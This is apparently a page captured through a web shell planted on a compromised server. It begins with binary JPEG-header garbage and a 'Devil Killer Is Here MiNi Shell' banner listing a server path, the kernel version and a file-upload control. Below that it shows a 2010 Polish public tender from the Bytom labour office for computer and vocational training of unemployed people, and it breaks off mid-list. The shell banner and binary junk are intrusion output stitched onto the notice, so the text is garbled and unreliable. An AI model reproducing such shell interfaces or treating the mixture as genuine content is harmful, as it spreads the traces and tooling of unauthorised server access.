JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100416/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100416/107964-N-2010.html

<p class="kh_header"><b>Bytom: Szkolenia komputerowe osób bezrobotnych, w podziale na VI  części.</b><br>
<b>Numer ogłoszenia: 107964 - 2010; data zamieszczenia: 16.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Łagiewnicka 15, 41-902 Bytom, woj. śląskie, tel. 032 2813307, 2817019, 2818860, faks 032 2818860.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pupbytom.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna samorządu terytorialnego. Powiatowy Urząd Pracy..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Szkolenia komputerowe osób bezrobotnych, w podziale na VI  części..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są szkolenia komputerowe osób bezrobotnych zarejestrowanych        w Powiatowym Urzędzie Pracy w Bytomiu, częściowo finansowane ze środków Europejskiego Funduszu Społecznego, w podziale na  VI  części.
Szkolenia winny odbywać się na terenie Bytomia lub w innej miejscowości, przy czym łączny czas dojazdu z centrum Bytomia do miejsca odbywania szkolenia i z powrotem środkami transportu zbiorowego nie może przekraczać 3 godzin. Zajęcia winny odbywać się codziennie, wyłącznie od poniedziałku do piątku, w godzinach przedpołudniowych lub popołudniowych. (zaczynać się nie wcześniej niż o godz. 8;00 kończyć nie później niż o godzinie 19;00),    w formie kursu , realizowanego według planu nauczania obejmującego przeciętnie nie mniej niż 30 godz. zegarowych w tygodniu.
Szkolenia będą realizowane do 30 września 2010 r. (szkolenia finansowane z EFS)             oraz  do  30 listopada 2010 r. (szkolenia finansowane z FP)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0, 80.53.30.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku:
Wykonawca winien posiadać zaktualizowany na 2010 rok wpis do rejestru instytucji szkoleniowych prowadzony przez Wojewódzki Urząd Pracy właściwy dla siedziby Wykonawcy, stosownie do treści art. 20 ust. 1 ustawy z dnia 20.04.2004 r. o promocji zatrudnienia i instytucjach rynku pracy (jt. Dz. U. z 2008 r. Nr 69, poz. 415).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku:
Wykonawca winien wykazać, iż w celu realizacji nin. zamówienia dysponuje lokalem obejmującym co najmniej:
a) salę wykładową posiadającą oświetlenie dzienne z możliwością zaciemnienia w postaci
     zasłon, rolet czy żaluzji oraz oświetlenie sztuczne,
      b)   WC,
      c)   pomieszczenie umożliwiające przygotowanie i spożycie posiłku oraz przygotowanie
            ciepłych i zimnych napojów                                                                                                 oraz wskazać podstawę dysponowania powyższym zasobem.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku:
Wykonawca jest zobowiązany wykazać, iż posiada aktualne opłacone ubezpieczenie od odpowiedzialności cywilnej z tytułu prowadzonej działalności szkoleniowej co najmniej na kwotę 13.000,00 zł.

W przypadku rozłożenia składki ubezpieczeniowej na raty, Zamawiający uzna spełnienie warunku w przypadku, gdy na dzień składania ofert opłacona została część wymagalnej składki.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	strony tytułowej - OFERTY, 
2)	preliminarza kosztów szkolenia,
3)	programu szkolenia,
4)	pełnomocnictwa do reprezentowania firmy w postępowaniu, jeżeli nie wynika ono z dokumentów przedłożonych w ofercie; w tym wynikające     z art. 23 ustawy Prawo zamówień publicznych lub zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert w przypadku gdy ofertę składa osoba fizyczna.
5)	wykazu części zamówienia, które Wykonawca zamierza powierzyć podwykonawcom - dotyczy wyłącznie Wykonawców, którzy zamierzają powierzyć wykonanie części zamówienia podwykonawcom.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty , za wyjątkiem możliwości i warunków dokonania takiej zmiany określonych poniżej:
a)	zmiana strony umowy tj. następstwo prawne wynikające z odrębnych przepisów,
b)	zmiana terminu wykonania zamówienia będąca następstwem okoliczności, których nie można było wcześniej przewidzieć i nie można jej przypisać Wykonawcy, w tym w przypadku przedłużającej się procedury przetargowej, jeżeli do wykonania zamówienia pozostało mniej niż 2 miesiące od dnia zawarcia umowy
c)	zmiany osób odpowiedzialnych za realizację niniejszej umowy,
d)	zmiany ilości uczestników szkolenia, będącej następstwem okoliczności, których nie można było przewidzieć.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pupbytom.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Bytomiu
ul. Łagiewnicka 15
41-902 Bytom
pok. 62.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.04.2010 godzina 10:00, miejsce: Powiatowy Urząd Pracy w Bytomiu
ul. Łagiewnicka 15
41-902 Bytom
pok. 24 Biuro Podawcze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Niniejsze zamówienie jest częściowo realizowane ze środków Europejskiego Funduszu Społecznego w ramach projektu Gotowi do pracy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CZĘŚĆ I  - obejmuje dwa szkolenia.
1.	PODSTAWY OBSŁUGI KOMPUTERA
2.	OFFICE FOR WINDOWS Z MODUŁEM OBSŁUGI INTERNETU.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	PODSTAWY OBSŁUGI KOMPUTERA

Liczba godzin na szkoleniu musi wynosić min. 150 godz. i zawierać następujące przedmioty nauczania:

	podstawowe informacje o sprzęcie komputerowym;
	budowa i działanie komputera; 
	logowanie do systemu; 
	tworzenie użytkowników; 
	operacje na oknach i ikonach; 
	ustawianie właściwości systemu; 
	praca w środowisku MS Windows; 
	edycja tekstów MS Word; 
	arkusz kalkulacyjny -  MS Excel; 
	obsługa i wykorzystanie sieci Internet; 
	poczta elektroniczna . 

Zamówienie obejmuje łącznie przeszkolenie 20 osób, w dwóch grupach dziesięcioosobowych i realizowane będzie w terminie od dnia zawarcia umowy do 30 listopada 2010 r.
2.	OFFICE FOR WINDOWS Z MODUŁEM OBSŁUGI INTERNETU

Liczba godzin na szkoleniu musi wynosić min. 200 godz. i zawierać  następujące przedmioty nauczania:

	podstawy obsługi komputera; 
	system operacyjny Windows; 
	edytor tekstu MS Word;  
	maszynopisanie komputerowe i korespondencja biurowa;  
	arkusz kalkulacyjny MS Excel;  
	Internet i poczta elektroniczna.  

Zamówienie obejmuje łącznie przeszkolenie15 osób - jedna grupa i realizowane będzie         w terminie od podpisania umowy do 30 listopada 2010 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0, 80.53.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CZĘŚĆ II  - obejmuje trzy szkolenia.
1.	TWORZENIE I PUBLIKOWANIE WITRYN Z SERWISEM REKLAMOWYM FIRMY I NOWOCZESNYM MARKETINGIEM INFORMACYJNYM
2.	GRAFIKA KOMPUTEROWA
3.	KOMPUTEROWE PROJEKTOWANIE 2D/3D W PROGRAMIE AutoCAD..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	TWORZENIE I PUBLIKOWANIE WITRYN Z SERWISEM REKLAMOWYM FIRMY I NOWOCZESNYM MARKETINGIEM INFORMACYJNYM

Liczba godzin na szkoleniu musi wynosić min. 300 godz. i zawierać  następujące przedmioty nauczania:

	wektorowa grafika komputerowa - CorelDRAW, Inkscape;
	rastrowa (bitmapowa) grafika komputerowa - Adobe Photoshop, Corel Photo-Paint, Gimp;
	tworzenie stron WWW w języku HTML/XHTML;
	grafika na stronach WWW. Animowana grafika komputerowa - Adobe Flash;
	tworzenie interaktywnych stron WWW - System Zarządzania Treścią (CMS) Joomla;
	tworzenie interaktywnych stron WWW w języku PHP wraz z obsługą bazy danych MySQL;
	podstawy e-marketingu, czyli promocja i reklama w Internecie.

Zamówienie obejmuje łącznie przeszkolenie10 osób - jedna grupa i realizowane będzie         w terminie od podpisania umowy do 30 listopada 2010 r.

2.	GRAFIKA KOMPUTEROWA

Liczba godzin na szkoleniu musi wynosić min. 250 godz. i zawierać następujące przedmioty nauczania:

	grafika prezentacyjna;
	MS PowerPoint; 
	wektorowa grafika komputerowa  - CorelDRAW/Adobe Ilustrator/Inkscape; 
	rastrowa (bitmapowa) grafika komputerowa  - Adobe Photoshop/GIMP/CorelPhoto-Paint; 
	animowana grafika komputerowa - Adobe Flash; 
	grafika DTP - Adobe InDesigne.
Zamówienie obejmuje łącznie przeszkolenie 10 osób i realizowane będzie w terminie od podpisania umowy do 30 listopada 2010 r.

3.	KOMPUTEROWE PROJEKTOWANIE 2D/3D W PROGRAMIE AutoCAD.

Liczba godzin na szkoleniu musi wynosić min. 70 godz. i zawierać następujące przedmioty nauczania:

	Praca z interfejsem programu AutoCAD, 
	modelowanie w przestrzeni 2D - obiekty płaskie, 
	modelowanie w przestrzeni 3D - bryły i siatki, 
	przygotowanie przestrzeni papieru - wydruk i prezentacja projektów. 

Zamówienie obejmuje łącznie przeszkolenie 10 osób - jedną grupę i realizowane będzie         w terminie od podpisania umowy do 30 listopada 2010 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0, 80.53.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III 
KOSZTORYSOWANIE ROBÓT BUDOWLANYCH..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> KOSZTORYSOWANIE ROBÓT BUDOWLANYCH.

Liczba godzin na szkoleniu musi wynosić min. 120 i zawierać  następujące przedmioty nauczania:
	prawo budowlane;
	prawo zamówień publicznych;
	proces inwestycyjny;
	zlecenia robót budowlanych;
	zasady kosztorysowania;
	normy kosztorysowe;
	kalkulacja kosztorysowa;
	kosztorys;
	obsługa komputera - programu kosztorysowego;
	umowa o wykonanie robót budowlanych. 

Zamówienie obejmuje łącznie przeszkolenie12 osób i realizowane będzie od podpisania umowy do 30 września 2010 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0, 80.53.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> CZĘŚĆ IV
MAGAZYNIER - HURTOWNIK Z MODUŁEM OBSŁUGI KASY FISKALNEJ I WÓZKA JEZDNIOWEGO..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> MAGAZYNIER - HURTOWNIK Z MODUŁEM OBSŁUGI KASY FISKALNEJ I WÓZKA JEZDNIOWEGO.

Liczba godzin na szkoleniu musi wynosić min. 220 i zawierać  następujące przedmioty nauczania:

	gospodarka magazynowa w przedsiębiorstwie produkcyjnym  i handlowym;
	dokumentacja magazynowa;
	 inwentaryzacja stanów magazynowych;
	gospodarka zapasami;
	sprawozdania i analizy;
	podstawy obsługi komputera i komputerowych programów handlowych;
	obsługa kas fiskalnych;
	operator wózka jezdniowego;
	szkolenie z zakresu przestrzegania zasad higieny w procesie produkcji i obrocie żywnością;
	pierwsza pomoc przedlekarska.

Zamówienie obejmuje łącznie przeszkolenie 50 osób, w pięciu grupach dziesięcioosobowych, 30 osób z EFS, 20 osób z FP  i realizowane będzie od podpisania umowy do: szkolenia finansowane z EFS do 30 września 2010 r., z FP do 30 listopada 2010r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0, 80.53.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> CZĘŚĆ V - obejmuje dwa szkolenia.
1.	SPRZEDAWCA - HANDLOWIEC
2.	OBSŁUGA KASY FISKALNEJ Z TERMINALEM KART PŁATNICZYCH        I SPRZEDAŻĄ INTERNETOWĄ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	SPRZEDAWCA - HANDLOWIEC

Liczba godzin na szkoleniu musi wynosić min. 200 i  zawierać następujące przedmioty nauczania:
	organizacja i technika sprzedaży;
	towaroznawstwo;
	podstawy rachunkowości;
	podstawy obsługi komputera i komputerowe programy handlowe;
	obsługa kas fiskalnych;
	szkolenie z zakresu przestrzegania zasad higieny w procesie produkcji i obrocie żywności;
	pierwsza pomoc przedlekarska.
Zamówienie obejmuje łącznie przeszkolenie 60 osób, w sześciu grupach dziesięcioosobowych i realizowane będzie od podpisania umowy do 30 września 2010 r.
2.	OBSŁUGA KASY FISKALNEJ Z TERMINALEM KART PŁATNICZYCH        I SPRZEDAŻĄ INTERNETOWĄ.

Liczba godzin na szkoleniu musi wynosić min. 150 i zawierać następujące przedmioty nauczania:
	zakres i obowiązki kasjera;
	techniki sprzedaży;
	podstawy obsługi klienta;
	kasy i drukarki fiskalne - sprzedaż hurtowa i detaliczna z wykorzystaniem kas i drukarek fiskalnych - budowa i obsługa, BHP przy urządzeniach elektrycznych;
	obsługa komputera;
	programowanie kasy fiskalnej przy użyciu programu komputerowego;
	karty płatnicze - opis rynku kart płatniczych i zasady działania kart płatniczych, rodzaje transakcji kartami płatniczymi, zabezpieczanie kart i procedury weryfikacyjne,  wykonywanie transakcji kartami płatniczymi, budowa terminala/PINpada, problemy występujące w czasie instalacji terminala PINpada; 
	doładowania telefonów komórkowych;
	rozliczanie placówki handlowej i kasjerów;
	sprzedaż internetowa;
	praca w sieci, obsługa sklepu, hurtowni i placówki małej gastronomii.

Zamówienie obejmować będzie łącznie przeszkolenie 30 osób, w trzech dziesięcioosobowych grupach i realizowane będzie od podpisania umowy do 30 września 2010 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0, 80.53.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> CZĘŚĆ VI - obejmuje trzy szkolenia.
1.	PRACOWNIK ADMINISTRACYJNO - BIUROWY Z MODUŁEM KADR         I PŁAC.
2.	RACHUNKOWOŚĆ PODMIOTÓW GOSPODARCZYCH.
3.	ABC PRZEDSIĘBIORCZOŚCI..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	PRACOWNIK ADMINISTRACYJNO - BIUROWY Z MODUŁEM KADR         I PŁAC.

Liczba godzin na szkoleniu musi wynosić min. 300 i zawierać następujące przedmioty nauczania:

	prowadzenie dokumentacji biurowej w tym archiwizacja dokumentów;
	organizacja pracy w biurze;
	podstawy księgowości, prowadzenie księgi przychodów  i rozchodów;
	klasyfikacja podstawowych podmiotów gospodarczych i usytuowanie w nich działu kadr i płac;
	wybrane zagadnienia z prawa pracy, prawa cywilnego i administracyjnego;
	kadry;
